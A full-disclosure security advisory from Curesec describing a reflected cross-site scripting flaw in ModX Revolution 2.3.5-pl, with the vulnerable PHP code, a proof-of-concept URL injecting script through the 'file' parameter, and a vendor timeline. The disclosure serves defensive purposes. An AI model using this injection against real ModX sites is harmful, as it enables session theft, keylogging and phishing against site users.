ModX Revolution 2.3.5-pl: Reflected Cross Site Scripting Vulnerability

ModX Revolution 2.3.5-pl: Reflected Cross Site Scripting Vulnerability

Date: 2015-08-17 09:27:03
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: ModX Revolution 2.3.5-pl
Fixed in: 2.3.6
Fixed Version Link: 2.3.6
Vendor Contact:
Vulnerability Type: Reflected XSS
Remote Exploitable: Yes
Reported to vendor: 07/14/2015
Disclosed to public: 08/17/2015
Release mode: Full disclosure
CVE: n/a
Credits Tim Coen of curesec GmbH

2. Vulnerability Description

ModX Revolution 2.3.5-pl is vulnerable to reflected cross site scripting. With this, it is possible to inject and execute arbitrary JavaScript code. This can for example be used by an attacker to inject a JavaScript keylogger, bypass CSRF protection, or perform phishing attacks.

The attack can be exploited by getting the victim to click a link or visit an attacker controlled website.

3. Proof of Concept

The injection takes place into the file GET argument, which is echoed inside script tags.

http://localhost/modx-2.3.5-pl/manager/?a=system/file/edit&file=xsstest",record: {"name":"","basename":"","path":"","size":false,"last_accessed":"Jan 01, 1970 01:00:00 AM","last_modified":"Jan 01, 1970 01:00:00 AM","content":false,"image":false,"is_writable":false,"is_readable":false,"source":1},canSave: 0});});alert(1); </script>&wctx=mgr&source=1

4. Code

manager/controllers/default/system/file/edit.class.php:28 public function loadCustomCssJs() { $this->addJavascript($this->modx->getOption('manager_url').'assets/modext/sections/system/file/edit.js'); $this->addHtml('<script type="text/javascript">Ext.onReady(function() { MODx.load({ xtype: "modx-page-file-edit" ,file: "'.$this->filename.'" ,record: '.$this->modx->toJSON($this->fileRecord).' ,canSave: '.($this->canSave ? 1 : 0).' }); });</script>'); }

5. Solution

This issue was not fixed by the vendor.

Update: According to the vendor, the issue was fixed on github at the day of our report. The fix was part of the 2.3.6 release on August the 18th 2015.

5. Report Timeline

07/14/2015 Informed Vendor about Issue (no reply)
08/13/2015 Contacted Vendor again (no reply)
08/17/2015 Disclosed to public
08/18/2015 Vendor Releases Fix